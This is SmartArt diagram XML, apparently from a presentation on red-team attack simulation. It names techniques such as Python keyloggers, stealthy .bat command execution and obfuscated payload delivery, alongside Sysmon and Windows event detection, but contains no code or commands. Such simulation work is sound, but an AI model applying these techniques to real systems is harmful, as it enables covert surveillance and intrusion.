        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0290B007-F570-4437-A2F4-9E7D1B28FACE}" type="sibTrans" cxnId="{1501389F-F05D-4716-9409-A5EAC4362818}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FAC12DED-383D-46D3-A87D-DABBB4FE9772}" type="pres">
      <dgm:prSet presAssocID="{1CE9CF36-3E92-45BD-AB57-23D770B53545}" presName="root" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A3871B02-72B0-44C1-87A3-634EA81B18B5}" type="pres">
      <dgm:prSet presAssocID="{D5293BB0-D691-4226-8763-2F7E264D9115}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1892B368-EB0D-47EC-8C76-07AC43095B0C}" type="pres">
      <dgm:prSet presAssocID="{D5293BB0-D691-4226-8763-2F7E264D9115}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{71E335FB-1D1F-46C4-AEB5-E9A635A84783}" type="pres">
      <dgm:prSet presAssocID="{D5293BB0-D691-4226-8763-2F7E264D91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AB94AEE-085A-4096-9709-21EE3B0CB949}" type="pres">
      <dgm:prSet presAssocID="{D5293BB0-D691-4226-8763-2F7E264D9115}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5687DEDF-4741-44A3-BB3D-DD527B3E8660}" type="pres">
      <dgm:prSet presAssocID="{D5293BB0-D691-4226-8763-2F7E264D9115}" presName="parTx" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{63732B83-CAB0-447D-B796-C1E049D56C67}" type="pres">
      <dgm:prSet presAssocID="{44BE5F43-0E5B-4CB6-ADAD-A43CCEC65A24}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{626CC00F-3836-420F-B981-4488F12D5195}" type="pres">
      <dgm:prSet presAssocID="{CFBC4CD1-8A2D-44A7-879B-FF58E505D116}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A0C7FDB3-9FDE-4107-83CF-EE564EBC50C9}" type="pres">
      <dgm:prSet presAssocID="{CFBC4CD1-8A2D-44A7-879B-FF58E505D116}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{29AF583D-8A3C-4ECF-9596-E412F1327C5A}" type="pres">
      <dgm:prSet presAssocID="{CFBC4CD1-8A2D-44A7-879B-FF58E505D1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o-Hazard"/>
        </a:ext>
      </dgm:extLst>
    </dgm:pt>
    <dgm:pt modelId="{816AEE20-21A4-42C5-82AC-6492117F8BED}" type="pres">
      <dgm:prSet presAssocID="{CFBC4CD1-8A2D-44A7-879B-FF58E505D116}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C9F8CB09-003F-4F99-A4FF-ACACDB352487}" type="pres">
      <dgm:prSet presAssocID="{CFBC4CD1-8A2D-44A7-879B-FF58E505D116}" presName="parTx" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{65AA1F33-5FC0-4EA7-9D4F-CAF5FD9BD803}" type="pres">
      <dgm:prSet presAssocID="{C2D2352C-31FE-4266-97C6-6DAD1EDAA68B}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6917EDCA-6944-4A03-BFCA-CFEAF4A914C2}" type="pres">
      <dgm:prSet presAssocID="{A119096A-1BA1-4880-B375-5FFAFBB7D909}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{696741E3-C230-4903-B530-EE92ACB427DB}" type="pres">
      <dgm:prSet presAssocID="{A119096A-1BA1-4880-B375-5FFAFBB7D909}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="2" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6C393097-A63B-4966-8901-56987294A6E5}" type="pres">
      <dgm:prSet presAssocID="{A119096A-1BA1-4880-B375-5FFAFBB7D9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5614E6A-7F54-45E1-83E8-6D8A40CF29E6}" type="pres">
      <dgm:prSet presAssocID="{A119096A-1BA1-4880-B375-5FFAFBB7D909}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4A2BB9CF-5C14-47D2-BE1E-354C94488713}" type="pres">
      <dgm:prSet presAssocID="{A119096A-1BA1-4880-B375-5FFAFBB7D90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F80090B-EA5C-4A01-BDA0-A85BDA3F20BC}" type="presOf" srcId="{D5293BB0-D691-4226-8763-2F7E264D9115}" destId="{5687DEDF-4741-44A3-BB3D-DD527B3E8660}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{A27CE55E-9E24-4C8B-B183-043612A5AC69}" type="presOf" srcId="{CFBC4CD1-8A2D-44A7-879B-FF58E505D116}" destId="{C9F8CB09-003F-4F99-A4FF-ACACDB352487}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{B13F1798-5CA6-47FF-8066-5433ED0EFC59}" type="presOf" srcId="{1CE9CF36-3E92-45BD-AB57-23D770B53545}" destId="{FAC12DED-383D-46D3-A87D-DABBB4FE9772}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{1501389F-F05D-4716-9409-A5EAC4362818}" srcId="{1CE9CF36-3E92-45BD-AB57-23D770B53545}" destId="{A119096A-1BA1-4880-B375-5FFAFBB7D909}" srcOrd="2" destOrd="0" parTransId="{27CD8C45-B9FB-42D0-A8AD-18C1E5B2B83C}" sibTransId="{0290B007-F570-4437-A2F4-9E7D1B28FACE}"/>
    <dgm:cxn modelId="{45502BD9-39FB-4754-9CB4-ED6B95489DA8}" type="presOf" srcId="{A119096A-1BA1-4880-B375-5FFAFBB7D909}" destId="{4A2BB9CF-5C14-47D2-BE1E-354C94488713}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{FF258FF8-8647-49EA-95B3-BADE79E1C159}" srcId="{1CE9CF36-3E92-45BD-AB57-23D770B53545}" destId="{CFBC4CD1-8A2D-44A7-879B-FF58E505D116}" srcOrd="1" destOrd="0" parTransId="{447C1B53-8237-474B-934B-936CADF6B282}" sibTransId="{C2D2352C-31FE-4266-97C6-6DAD1EDAA68B}"/>
    <dgm:cxn modelId="{97001BFE-3EF1-462C-B013-B6A6D3824A7D}" srcId="{1CE9CF36-3E92-45BD-AB57-23D770B53545}" destId="{D5293BB0-D691-4226-8763-2F7E264D9115}" srcOrd="0" destOrd="0" parTransId="{95F01A02-17C7-455B-933D-97A36BAF31E7}" sibTransId="{44BE5F43-0E5B-4CB6-ADAD-A43CCEC65A24}"/>
    <dgm:cxn modelId="{4E19784A-6441-48C8-B66D-8D5124A3B546}" type="presParOf" srcId="{FAC12DED-383D-46D3-A87D-DABBB4FE9772}" destId="{A3871B02-72B0-44C1-87A3-634EA81B18B5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{E75ADC74-D88D-49D6-84D8-267DF8D48ED1}" type="presParOf" srcId="{A3871B02-72B0-44C1-87A3-634EA81B18B5}" destId="{1892B368-EB0D-47EC-8C76-07AC43095B0C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{FA68F0FF-F225-483B-BFE3-4690E526D5E4}" type="presParOf" srcId="{A3871B02-72B0-44C1-87A3-634EA81B18B5}" destId="{71E335FB-1D1F-46C4-AEB5-E9A635A84783}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{7305AE3B-AD76-4DD4-846B-74A539BCF125}" type="presParOf" srcId="{A3871B02-72B0-44C1-87A3-634EA81B18B5}" destId="{AAB94AEE-085A-4096-9709-21EE3B0CB949}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{2B80D4D7-6299-47F4-BC8F-B790F728709F}" type="presParOf" srcId="{A3871B02-72B0-44C1-87A3-634EA81B18B5}" destId="{5687DEDF-4741-44A3-BB3D-DD527B3E8660}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{6656B9BE-07C4-47EF-9314-680E126BDBC6}" type="presParOf" srcId="{FAC12DED-383D-46D3-A87D-DABBB4FE9772}" destId="{63732B83-CAB0-447D-B796-C1E049D56C67}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{7960BE8A-F227-4AF1-965E-EC17CDE74F1D}" type="presParOf" srcId="{FAC12DED-383D-46D3-A87D-DABBB4FE9772}" destId="{626CC00F-3836-420F-B981-4488F12D5195}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{2CCFCC55-0928-4357-A104-6976DDC83FE6}" type="presParOf" srcId="{626CC00F-3836-420F-B981-4488F12D5195}" destId="{A0C7FDB3-9FDE-4107-83CF-EE564EBC50C9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{88F4C01D-6AF5-4E05-97FD-2C3AE12FB3D7}" type="presParOf" srcId="{626CC00F-3836-420F-B981-4488F12D5195}" destId="{29AF583D-8A3C-4ECF-9596-E412F1327C5A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{FA79EC2D-088A-46FE-BF74-19090F78B709}" type="presParOf" srcId="{626CC00F-3836-420F-B981-4488F12D5195}" destId="{816AEE20-21A4-42C5-82AC-6492117F8BED}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{1D4481F8-46FD-4FD8-BB22-392CC5B69ACB}" type="presParOf" srcId="{626CC00F-3836-420F-B981-4488F12D5195}" destId="{C9F8CB09-003F-4F99-A4FF-ACACDB352487}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{D3D896BD-6758-467D-AC59-0333F578C5EC}" type="presParOf" srcId="{FAC12DED-383D-46D3-A87D-DABBB4FE9772}" destId="{65AA1F33-5FC0-4EA7-9D4F-CAF5FD9BD803}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{5A0CECEB-0899-42E3-8340-FFBA9678A1BB}" type="presParOf" srcId="{FAC12DED-383D-46D3-A87D-DABBB4FE9772}" destId="{6917EDCA-6944-4A03-BFCA-CFEAF4A914C2}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{3276C6FC-F31D-417A-A141-2BCAC85374A1}" type="presParOf" srcId="{6917EDCA-6944-4A03-BFCA-CFEAF4A914C2}" destId="{696741E3-C230-4903-B530-EE92ACB427DB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{418D9EEC-5DBB-4514-AC6A-5AE9E3B28BE0}" type="presParOf" srcId="{6917EDCA-6944-4A03-BFCA-CFEAF4A914C2}" destId="{6C393097-A63B-4966-8901-56987294A6E5}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{622C1D6B-F018-4EC6-AF12-78F7A477A70D}" type="presParOf" srcId="{6917EDCA-6944-4A03-BFCA-CFEAF4A914C2}" destId="{45614E6A-7F54-45E1-83E8-6D8A40CF29E6}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{3C2C1351-0763-4348-A273-3F68F1E39476}" type="presParOf" srcId="{6917EDCA-6944-4A03-BFCA-CFEAF4A914C2}" destId="{4A2BB9CF-5C14-47D2-BE1E-354C944887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1E48C6-B965-423D-BC52-78807F2025CF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026AF5-451E-4368-AF08-864FCD1A1917}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB"/>
            <a:t>We simulate stealthy techniques using custom tools and scripts that mirror real-world attacker behaviour:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{91FB959E-6355-4453-841D-14ADFD76C62F}" type="parTrans" cxnId="{0B174F08-0980-4113-A8C1-B65E4300B0F4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9F04EEB2-9E34-4137-96EB-B57A1B1A72D0}" type="sibTrans" cxnId="{0B174F08-0980-4113-A8C1-B65E4300B0F4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E31CA39B-2A65-444E-929E-DA970D566541}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB" b="1"/>
            <a:t>Keystroke logging</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB"/>
            <a:t> using Python-based keyloggers (keylog.py, activity_logger.py)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F3B3E327-C3DC-4C63-8CDB-AF12FA7AFDB9}" type="parTrans" cxnId="{FA8D0953-8835-4EE6-AD59-AC696D6AB23A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AC747FFF-044E-4002-BB59-8456BB04539C}" type="sibTrans" cxnId="{FA8D0953-8835-4EE6-AD59-AC696D6AB23A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9BA1F553-C6CF-430E-839A-D8CBC18BF71C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB" b="1"/>
            <a:t>Stealthy command execution</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB"/>
            <a:t> via .bat scripts (cmd_commands.bat) and precompiled executables</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{39111BCD-610A-462D-9134-8C641A2763CE}" type="parTrans" cxnId="{C8DB7D94-26CC-41F0-A6A2-9C5479975E7D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{683A80C3-A43D-4348-96DC-891DEF24A2D0}" type="sibTrans" cxnId="{C8DB7D94-26CC-41F0-A6A2-9C5479975E7D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DB532414-D402-4ED8-B8BB-5B7F1DB7A090}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB" b="1"/>
            <a:t>Payload delivery &amp; execution</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB"/>
            <a:t> using .exe binaries and obfuscated commands</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4B200893-82DF-4E7C-A693-E68661E12EBE}" type="parTrans" cxnId="{095BCC6A-EB38-4E87-95F3-9A3A4875F468}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2D63138C-27AD-459C-B3FE-18D07BE01A27}" type="sibTrans" cxnId="{095BCC6A-EB38-4E87-95F3-9A3A4875F468}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2AA11012-A041-47DA-B467-75F617477D32}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB" b="1"/>
            <a:t>Command lists</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB"/>
            <a:t> structured and tested through cmd_commands.txt for controlled execution scenarios</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{829A0626-72E7-447B-92F4-0DEE882EC6D7}" type="parTrans" cxnId="{36940E95-CF74-4596-9665-7E4B2715440A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3B57D30D-2C6F-4A19-B24F-1DF8E8F9DAB9}" type="sibTrans" cxnId="{36940E95-CF74-4596-9665-7E4B2715440A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{188C5F87-D1D0-40B1-9FC0-A9FD5D26D790}" type="pres">
      <dgm:prSet presAssocID="{491E48C6-B965-423D-BC52-78807F2025CF}" presName="linear" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9AE2A5D5-14C2-43B2-8410-8D99CE20F2ED}" type="pres">
      <dgm:prSet presAssocID="{B8026AF5-451E-4368-AF08-864FCD1A191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B6AB69B-DFEE-4851-BDBD-679DEC3B28AC}" type="pres">
      <dgm:prSet presAssocID="{9F04EEB2-9E34-4137-96EB-B57A1B1A72D0}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{98F0B26A-2966-46D4-B25B-9FA247045BCC}" type="pres">
      <dgm:prSet presAssocID="{E31CA39B-2A65-444E-929E-DA970D56654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385FB39-682F-4A17-AB0F-13F7AEF2BD92}" type="pres">
      <dgm:prSet presAssocID="{AC747FFF-044E-4002-BB59-8456BB04539C}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F99561F1-49AF-4554-B5F5-3FE31C7CD931}" type="pres">
      <dgm:prSet presAssocID="{9BA1F553-C6CF-430E-839A-D8CBC18BF71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B772979-C582-45DB-94D3-43429D973FC7}" type="pres">
      <dgm:prSet presAssocID="{683A80C3-A43D-4348-96DC-891DEF24A2D0}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D382FCAD-69DB-4EE5-B519-6F48883D1284}" type="pres">
      <dgm:prSet presAssocID="{DB532414-D402-4ED8-B8BB-5B7F1DB7A09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E1B92A2-60AB-4C94-B9B1-588FFB30EAEA}" type="pres">
      <dgm:prSet presAssocID="{2D63138C-27AD-459C-B3FE-18D07BE01A27}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8929226F-957D-4997-BC73-5037F5A30620}" type="pres">
      <dgm:prSet presAssocID="{2AA11012-A041-47DA-B467-75F617477D3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B174F08-0980-4113-A8C1-B65E4300B0F4}" srcId="{491E48C6-B965-423D-BC52-78807F2025CF}" destId="{B8026AF5-451E-4368-AF08-864FCD1A1917}" srcOrd="0" destOrd="0" parTransId="{91FB959E-6355-4453-841D-14ADFD76C62F}" sibTransId="{9F04EEB2-9E34-4137-96EB-B57A1B1A72D0}"/>
    <dgm:cxn modelId="{CFE39815-4C30-4F2B-86BD-EB47EFB98193}" type="presOf" srcId="{DB532414-D402-4ED8-B8BB-5B7F1DB7A090}" destId="{D382FCAD-69DB-4EE5-B519-6F48883D1284}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{DAE8FD17-6676-4F4B-91F9-6BC669C575C8}" type="presOf" srcId="{2AA11012-A041-47DA-B467-75F617477D32}" destId="{8929226F-957D-4997-BC73-5037F5A30620}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{0BEC4936-0D23-473D-A9D5-C78038225FC9}" type="presOf" srcId="{E31CA39B-2A65-444E-929E-DA970D566541}" destId="{98F0B26A-2966-46D4-B25B-9FA247045BCC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{E2055769-D8F0-474A-A429-A874990EDF8C}" type="presOf" srcId="{B8026AF5-451E-4368-AF08-864FCD1A1917}" destId="{9AE2A5D5-14C2-43B2-8410-8D99CE20F2ED}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{095BCC6A-EB38-4E87-95F3-9A3A4875F468}" srcId="{491E48C6-B965-423D-BC52-78807F2025CF}" destId="{DB532414-D402-4ED8-B8BB-5B7F1DB7A090}" srcOrd="3" destOrd="0" parTransId="{4B200893-82DF-4E7C-A693-E68661E12EBE}" sibTransId="{2D63138C-27AD-459C-B3FE-18D07BE01A27}"/>
    <dgm:cxn modelId="{FA8D0953-8835-4EE6-AD59-AC696D6AB23A}" srcId="{491E48C6-B965-423D-BC52-78807F2025CF}" destId="{E31CA39B-2A65-444E-929E-DA970D566541}" srcOrd="1" destOrd="0" parTransId="{F3B3E327-C3DC-4C63-8CDB-AF12FA7AFDB9}" sibTransId="{AC747FFF-044E-4002-BB59-8456BB04539C}"/>
    <dgm:cxn modelId="{C8DB7D94-26CC-41F0-A6A2-9C5479975E7D}" srcId="{491E48C6-B965-423D-BC52-78807F2025CF}" destId="{9BA1F553-C6CF-430E-839A-D8CBC18BF71C}" srcOrd="2" destOrd="0" parTransId="{39111BCD-610A-462D-9134-8C641A2763CE}" sibTransId="{683A80C3-A43D-4348-96DC-891DEF24A2D0}"/>
    <dgm:cxn modelId="{36940E95-CF74-4596-9665-7E4B2715440A}" srcId="{491E48C6-B965-423D-BC52-78807F2025CF}" destId="{2AA11012-A041-47DA-B467-75F617477D32}" srcOrd="4" destOrd="0" parTransId="{829A0626-72E7-447B-92F4-0DEE882EC6D7}" sibTransId="{3B57D30D-2C6F-4A19-B24F-1DF8E8F9DAB9}"/>
    <dgm:cxn modelId="{B96CC1CF-3BF1-478A-BE33-4E61DC29EA0B}" type="presOf" srcId="{9BA1F553-C6CF-430E-839A-D8CBC18BF71C}" destId="{F99561F1-49AF-4554-B5F5-3FE31C7CD931}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{201249ED-B28D-4475-9C87-CD1506FC1ABA}" type="presOf" srcId="{491E48C6-B965-423D-BC52-78807F2025CF}" destId="{188C5F87-D1D0-40B1-9FC0-A9FD5D26D790}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{DB02C02E-8127-443A-B687-8E0C1D6046FD}" type="presParOf" srcId="{188C5F87-D1D0-40B1-9FC0-A9FD5D26D790}" destId="{9AE2A5D5-14C2-43B2-8410-8D99CE20F2ED}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{0C9F4E16-1B1D-414A-8F7B-17C68A88FC5A}" type="presParOf" srcId="{188C5F87-D1D0-40B1-9FC0-A9FD5D26D790}" destId="{1B6AB69B-DFEE-4851-BDBD-679DEC3B28AC}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{6B627FE2-B5ED-48B8-A53E-F20EAD1DCD6A}" type="presParOf" srcId="{188C5F87-D1D0-40B1-9FC0-A9FD5D26D790}" destId="{98F0B26A-2966-46D4-B25B-9FA247045BCC}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{6C9A6D9B-8745-4918-8BBB-336876921866}" type="presParOf" srcId="{188C5F87-D1D0-40B1-9FC0-A9FD5D26D790}" destId="{E385FB39-682F-4A17-AB0F-13F7AEF2BD92}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{67E0A4F8-D9E0-48E4-9800-55A65B02267F}" type="presParOf" srcId="{188C5F87-D1D0-40B1-9FC0-A9FD5D26D790}" destId="{F99561F1-49AF-4554-B5F5-3FE31C7CD931}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{DFF696B0-C8BD-406E-B6C0-29745DD8CE89}" type="presParOf" srcId="{188C5F87-D1D0-40B1-9FC0-A9FD5D26D790}" destId="{1B772979-C582-45DB-94D3-43429D973FC7}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{4E82ADDC-2B5A-4E8B-BA16-225C13934483}" type="presParOf" srcId="{188C5F87-D1D0-40B1-9FC0-A9FD5D26D790}" destId="{D382FCAD-69DB-4EE5-B519-6F48883D1284}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{14B2C012-E892-4010-AC0B-043B99D8FF02}" type="presParOf" srcId="{188C5F87-D1D0-40B1-9FC0-A9FD5D26D790}" destId="{FE1B92A2-60AB-4C94-B9B1-588FFB30EAEA}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{A4F2E058-A881-4293-8C5C-6103B0D2A392}" type="presParOf" srcId="{188C5F87-D1D0-40B1-9FC0-A9FD5D26D790}" destId="{8929226F-957D-4997-BC73-5037F5A3062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EE9D9A-B8C9-4A4E-9563-E6C5E726F06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49076-6CFE-4D95-9D4A-E4A372B6E38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Process Monitoring</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB"/>
            <a:t> (Sysmon Event ID 1, Windows 4688)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2BA46C1E-0699-484E-B570-4F05BC3129F7}" type="parTrans" cxnId="{9AB27F8D-4ECD-43EA-8590-6F92666DDD50}">
      <dgm:prSet/>
